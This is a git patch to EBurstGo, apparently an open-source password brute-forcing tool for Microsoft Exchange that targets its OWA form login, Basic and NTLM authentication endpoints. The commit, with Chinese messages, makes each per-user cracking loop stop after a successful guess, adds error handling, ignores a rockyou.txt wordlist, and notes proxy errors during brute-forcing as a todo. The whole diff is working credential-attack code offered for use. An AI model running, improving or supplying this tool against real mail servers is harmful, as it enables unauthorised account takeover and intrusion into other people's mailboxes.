From 86e99755b4cb2cf8cc2b731a79cd8cf13350e210 Mon Sep 17 00:00:00 2001 From: X1r0z Date: Thu, 10 Aug 2023 00:19:37 +0800 Subject: [PATCH] =?UTF-8?q?fix:=20=E7=88=86=E7=A0=B4=E6=88=90=E5=8A=9F?= =?UTF-8?q?=E5=90=8E=E7=A8=8B=E5=BA=8F=E4=BB=8D=E5=9C=A8=E8=BF=90=E8=A1=8C?= =?UTF-8?q?=E7=9A=84=E9=97=AE=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 修复爆破某一账户成功后程序仍在运行的问题 --- .gitignore | 1 + README.md | 1 + lib/basicbrute.go | 9 ++++++- lib/httpbrute.go | 9 ++++++- lib/ntlmbrute.go | 10 +++++-- lib/run.go | 66 +++++++++++++++++++++++++++++++---------------- 6 files changed, 70 insertions(+), 26 deletions(-) diff --git a/.gitignore b/.gitignore index fdb5e4f..aa54ada 100644 --- a/.gitignore +++ b/.gitignore @@ -3,4 +3,5 @@ EBurstGo user.txt pass.txt +rockyou.txt dist/ diff --git a/README.md b/README.md index 55de656..98194c2 100644 --- a/README.md +++ b/README.md @@ -81,4 +81,5 @@ $ ./EBurstGo -url https://192.168.30.11 -domain hack-my.com -userf user.txt -pas ``` todo +- 开启代理爆破一段时间会出现 `connection refused`, 待解决 - `/powershell` 接口 (Kerberos 认证) 待支持 \ No newline at end of file diff --git a/lib/basicbrute.go b/lib/basicbrute.go index 219f7c6..551d0cb 100644 --- a/lib/basicbrute.go +++ b/lib/basicbrute.go @@ -8,14 +8,21 @@ import ( func BasicBruteWorker(info *TaskInfo) { for data := range info.task { + if info.done.GetDone() { + break + } username, password := data[0], data[1] Log.Debug("[*] 尝试: %v:%v", username, password) req, _ := http.NewRequest("OPTIONS", info.u, nil) req.SetBasicAuth(info.domain+"\\"+username, password) req.Header.Add("Connection", "close") - res, _ := Client.Do(req) + res, err := Client.Do(req) + if err != nil { + panic(err) + } if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 { Log.Success("[+] 成功: %v", username+":"+password) + info.done.SetDone() } else { Log.Failed("[-] 失败: %v", username+":"+password) } diff --git a/lib/httpbrute.go b/lib/httpbrute.go index af11294..df69f6f 100644 --- a/lib/httpbrute.go +++ b/lib/httpbrute.go @@ -18,6 +18,9 @@ func HttpBruteWorker(info *TaskInfo) { referer, _ := url.JoinPath(info.targetUrl, "/owa/auth/logon.aspx?replaceCurrent=1&url="+refUrl) for data := range info.task { + if info.done.GetDone() { + break + } username, password := data[0], data[1] Log.Debug("[*] 尝试: %v:%v", username, password) form := url.Values{ @@ -36,13 +39,17 @@ func HttpBruteWorker(info *TaskInfo) { req.Header.Set("Cookie", "PrivateComputer=true; PBack=0") req.Header.Set("Connection", "close") - res, _ := Client.Do(req) + res, err := Client.Do(req) + if err != nil { + panic(err) + } location := res.Header.Get("Location") if location == "" { Log.Failed("[-] 失败: %v", username+":"+password) } else if !strings.Contains(location, "reason") { Log.Success("[+] 成功: %v", username+":"+password) + info.done.SetDone() } else { Log.Failed("[-] 失败: %v", username+":"+password) } diff --git a/lib/ntlmbrute.go b/lib/ntlmbrute.go index 989be98..eda6298 100644 --- a/lib/ntlmbrute.go +++ b/lib/ntlmbrute.go @@ -10,6 +10,9 @@ import ( func NtlmBruteWorker(info *TaskInfo) { for data := range info.task { + if info.done.GetDone() { + break + } username, password := data[0], data[1] Log.Debug("[*] 尝试: %v:%v", username, password) @@ -28,10 +31,13 @@ func NtlmBruteWorker(info *TaskInfo) { } req, _ := http.NewRequest("GET", info.u, nil) req.SetBasicAuth(info.domain+"\\"+username, password) - res, _ := client.Do(req) - + res, err := client.Do(req) + if err != nil { + panic(err) + } if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 { Log.Success("[+] 成功: %v", username+":"+password) + info.done.SetDone() } else { Log.Failed("[-] 失败: %v", username+":"+password) } diff --git a/lib/run.go b/lib/run.go index e6af71d..8b44b14 100644 --- a/lib/run.go +++ b/lib/run.go @@ -12,9 +12,27 @@ type TaskInfo struct { u string domain string task chan []string + done *DoneFlag delay int } +type DoneFlag struct { + mu sync.RWMutex + done bool +} + +func (c *DoneFlag) GetDone() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.done +} + +func (c *DoneFlag) SetDone() { + c.mu.Lock() + defer c.mu.Unlock() + c.done = true +} + type BruteWorker func(info *TaskInfo) func BruteRunner(targetUrl string, mode string, domain string, userDict []string, passDict []string, n int, delay int, worker BruteWorker) { @@ -24,38 +42,42 @@ func BruteRunner(targetUrl string, mode string, domain string, userDict []string Log.Info("[*] 使用 %v 接口爆破: %v", mode, targetUrl) Log.Info("[*] 用户名:%v 密码:%v 共计:%v", len(userDict), len(passDict), len(userDict)*len(passDict)) - task := make(chan []string, len(userDict)*len(passDict)) - - info := &TaskInfo{ - targetUrl: targetUrl, - mode: mode, - u: u, - domain: domain, - task: task, - delay: delay, - } - t1 := time.Now() for _, username := range userDict { + + task := make(chan []string, len(passDict)) + done := &DoneFlag{done: false} + + info := &TaskInfo{ + targetUrl: targetUrl, + mode: mode, + u: u, + domain: domain, + task: task, + done: done, + delay: delay, + } + for _, password := range passDict { data := []string{username, password} task <- data } - } - close(task) - var wg sync.WaitGroup + close(task) - for i := 0; i < n; i++ { - wg.Add(1) - go func() { - defer wg.Done() - worker(info) - }() - } + var wg sync.WaitGroup + + for i := 0; i < n; i++ { + wg.Add(1) + go func() { + defer wg.Done() + worker(info) + }() + } - wg.Wait() + wg.Wait() + } t2 := time.Now() Log.Info("[*] 耗时: %v", t2.Sub(t1))